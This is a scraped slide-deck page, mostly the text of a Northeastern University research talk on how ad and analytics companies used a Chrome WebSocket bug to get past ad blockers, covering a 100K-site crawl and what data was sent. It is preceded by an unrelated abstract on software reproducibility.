The ability to recreate computational results with minimal effort and actionable metrics provides a solid foundation for scientific research and software development. When people can replicate an analysis at the touch of a button using open-source software, open data, and methods to assess and compare proposals, it significantly eases verification of results, engagement with a diverse range of contributors, and progress. However, we have yet to fully achieve this; there are still many sociotechnical frictions.
Inspired by David Donoho's vision, this talk aims to revisit the three crucial pillars of frictionless reproducibility (data sharing, code sharing, and competitive challenges) with the perspective of deep software variability.
Our observation is that multiple layers — hardware, operating systems, third-party libraries, software versions, input data, compile-time options, and parameters — are subject to variability that exacerbates frictions but is also essential for achieving robust, generalizable results and fostering innovation. I will first review the literature, providing evidence of how the complex variability interactions across these layers affect qualitative and quantitative software properties, thereby complicating the reproduction and replication of scientific studies in various fields.
I will then present some software engineering and AI techniques that can support the strategic exploration of variability spaces. These include the use of abstractions and models (e.g., feature models), sampling strategies (e.g., uniform, random), cost-effective measurements (e.g., incremental build of software configurations), and dimensionality reduction methods (e.g., transfer learning, feature selection, software debloating).
I will finally argue that deep variability is both the problem and solution of frictionless reproducibility, calling the software science community to develop new methods and tools to manage variability and foster reproducibility in software systems.
Exposé invité Journées Nationales du GDR GPL 2024
ESPP presentation to EU Waste Water Network, 4th June 2024 “EU policies driving nutrient removal and recycling
and the revised UWWTD (Urban Waste Water Treatment Directive)”
How Tracking Companies Circumvented Ad Blockers Using WebSockets
1. How Tracking Companies Circumvented
Ad Blockers Using WebSockets
Muhammad Ahmad Bashir, Sajjad Arshad, Engin Kirda,
William Robertson, Christo Wilson
Northeastern University
3. Online Tracking
Surge in online advertising (internet economy)
• Ad networks pour in billions of dollars.
• Value for their investment?
• Extensive tracking to serve targeted ads.
2
4. Online Tracking
Surge in online advertising (internet economy)
• Ad networks pour in billions of dollars.
• Value for their investment?
• Extensive tracking to serve targeted ads.
2
User concern over tracking
• Led to the proliferation of ad blocking extensions
5. Online Tracking
Surge in online advertising (internet economy)
• Ad networks pour in billions of dollars.
• Value for their investment?
• Extensive tracking to serve targeted ads.
2
User concern over tracking
• Led to the proliferation of ad blocking extensions
Ad networks fight back
• E.g Using anti ad blocking scripts
6. Google & Safari
• Google evaded Safari’s third-party cookie blocking policy
(Jonathan Mayer)
• … by submitting a form in an invisible iFrame
• Google was fined $22.5M by FTC
3
7. This Talk
How Ad Networks leveraged a bug in
Chrome API to bypass Ad Blockers
using WebSockets
4
8. This Talk
How Ad Networks leveraged a bug in
Chrome API to bypass Ad Blockers
using WebSockets
4
1. What caused this?
2. How this bug was leveraged by ad networks?
18. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
19. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
webRequest API
20. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
21. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
Usually borrowed
from EasyList
22. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
url
Usually borrowed
from EasyList
23. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
url
Usually borrowed
from EasyList
24. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
url
Usually borrowed
from EasyList
25. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
url
webRequest API
Usually borrowed
from EasyList
26. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
http://doubleclick.com/s1.js
url
webRequest API
Usually borrowed
from EasyList
27. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
http://doubleclick.com/s1.js
url
webRequest API
url
Usually borrowed
from EasyList
28. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
http://doubleclick.com/s1.js
url
webRequest API
url
Usually borrowed
from EasyList
29. Ad Blockers
6
• Chrome extension chrome.webRequest API
• Extension can inspect / modify / drop outgoing requests
http://cnn.com/logo.jpeg
webRequest API
Rule List
http://doubleclick.com/s1.js
url
webRequest API
url
Usually borrowed
from EasyList
32. AdBlock Evasion
• Bug in
• ws/wss requests did not trigger the API
7
2012 2013 2014 2015 2016 2017 2018
webRequest API
33. AdBlock Evasion
• Bug in
• ws/wss requests did not trigger the API
7
2012 2013 2014 2015 2016 2017 2018
Original bug
reported
webRequest API
34. AdBlock Evasion
• Bug in
• ws/wss requests did not trigger the API
7
2012 2013 2014 2015 2016 2017 2018
Original bug
reported
Users report
unblocked ads
webRequest API
35. AdBlock Evasion
• Bug in
• ws/wss requests did not trigger the API
7
2012 2013 2014 2015 2016 2017 2018
Original bug
reported
Users report
unblocked ads
Patch
Finalized
( Landed)
webRequest API
36. AdBlock Evasion
• Bug in
• ws/wss requests did not trigger the API
7
2012 2013 2014 2015 2016 2017 2018
Original bug
reported
Users report
unblocked ads
Patch
Finalized
( Landed)
Chrome 58
released
webRequest API
37. AdBlock Evasion
• Bug in
• ws/wss requests did not trigger the API
7
2012 2013 2014 2015 2016 2017 2018
* * * *
Original bug
reported
Users report
unblocked ads
Patch
Finalized
( Landed)
Chrome 58
released
* Represents when our crawls were done
webRequest API
40. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
41. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
This means we know
which resource included
which other resource
42. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
Filter all resources
which end in
web sockets
Filter
WebSockets
This means we know
which resource included
which other resource
43. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
Filter all resources
which end in
web sockets
Filter
WebSockets
Detect A&A
WebSockets
Mark web sockets
which are used by
A&A domains
A&A = Advertising and Analytics
e.g. DoubleClick, Criteo, Adnxs
This means we know
which resource included
which other resource
44. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
Filter all resources
which end in
web sockets
Filter
WebSockets
Detect A&A
WebSockets
Mark web sockets
which are used by
A&A domains
A&A = Advertising and Analytics
e.g. DoubleClick, Criteo, Adnxs
This means we know
which resource included
which other resource
pub/
index.html
srv.ws ads/
script.js
ads/
frame.html
ads/
img_a.jpg
adnet/
data.ws
Example Inclusion Tree
45. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
Filter all resources
which end in
web sockets
Filter
WebSockets
Detect A&A
WebSockets
Mark web sockets
which are used by
A&A domains
A&A = Advertising and Analytics
e.g. DoubleClick, Criteo, Adnxs
This means we know
which resource included
which other resource
pub/
index.html
srv.ws ads/
script.js
ads/
frame.html
ads/
img_a.jpg
adnet/
data.ws
Example Inclusion Tree
WebSocket
WebSocket
46. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
Filter all resources
which end in
web sockets
Filter
WebSockets
Detect A&A
WebSockets
Mark web sockets
which are used by
A&A domains
A&A = Advertising and Analytics
e.g. DoubleClick, Criteo, Adnxs
This means we know
which resource included
which other resource
pub/
index.html
srv.ws ads/
script.js
ads/
frame.html
adnet/
data.ws
Example Inclusion Tree
WebSocket
WebSocket
47. Data Crawling
8
100K websites
sampled from Alexa Visit 15
links / website
Collected chains for
all included
resources
Filter all resources
which end in
web sockets
Filter
WebSockets
Detect A&A
WebSockets
Mark web sockets
which are used by
A&A domains
A&A = Advertising and Analytics
e.g. DoubleClick, Criteo, Adnxs
This means we know
which resource included
which other resource
pub/
index.html
ads/
script.js
ads/
frame.html
adnet/
data.ws
Example Inclusion Tree
WebSocket
68. Sent Items Over Web Sockets
11
Cookie
IP
User IDs
Fingerprinting
Variables
DOM
% Requests
0 20 40 60 80
WebSockets
HTTP/S
69. Sent Items Over Web Sockets
11
•Stateful Identifiers like Cookie and User IDs
Cookie
IP
User IDs
Fingerprinting
Variables
DOM
% Requests
0 20 40 60 80
WebSockets
HTTP/S
70. Sent Items Over Web Sockets
11
•Stateful Identifiers like Cookie and User IDs
• Fingerprinting data in ~3.4% WebSockets.
97% is 33across
Cookie
IP
User IDs
Fingerprinting
Variables
DOM
% Requests
0 20 40 60 80
WebSockets
HTTP/S
71. Sent Items Over Web Sockets
11
•Stateful Identifiers like Cookie and User IDs
• Fingerprinting data in ~3.4% WebSockets.
97% is 33across
• ~1.6% WebSockets sends the entire DOM to
Hotjar, LuckyOrange, TruConversion
Cookie
IP
User IDs
Fingerprinting
Variables
DOM
% Requests
0 20 40 60 80
WebSockets
HTTP/S
73. 12
Received Items Over Web Sockets
HTML
JSON
JavaScript
Images
% Responses
0 10 20 30 40 50
WebSockets
HTTP/S
74. 12
Received Items Over Web Sockets
HTML
JSON
JavaScript
Images
% Responses
0 10 20 30 40 50
WebSockets
HTTP/S
75. 12
Received Items Over Web Sockets
HTML
JSON
JavaScript
Images
% Responses
0 10 20 30 40 50
WebSockets
HTTP/S
76. 12
Received Items Over Web Sockets
Ads served from Lockerdome
HTML
JSON
JavaScript
Images
% Responses
0 10 20 30 40 50
WebSockets
HTTP/S
77. Summary
• ~67% of socket connections are initiated or received by A&A domains.
• Major companies like Google, Facebook, Addthis adopted WebSockets.
Abandoned after Chrome 58 was released.
• The culprits:
• 33across was harvesting fingerprinting data.
• DOM exfiltration by HotJar, LuckyOrange, TruConversion
• Lockerdome downloaded URLs to serve ads.
• We need to keep up with the current practices of A&A companies.
13
78. Summary
• ~67% of socket connections are initiated or received by A&A domains.
• Major companies like Google, Facebook, Addthis adopted WebSockets.
Abandoned after Chrome 58 was released.
• The culprits:
• 33across was harvesting fingerprinting data.
• DOM exfiltration by HotJar, LuckyOrange, TruConversion
• Lockerdome downloaded URLs to serve ads.
• We need to keep up with the current practices of A&A companies.
13
Questions?
ahmad@ccs.neu.edu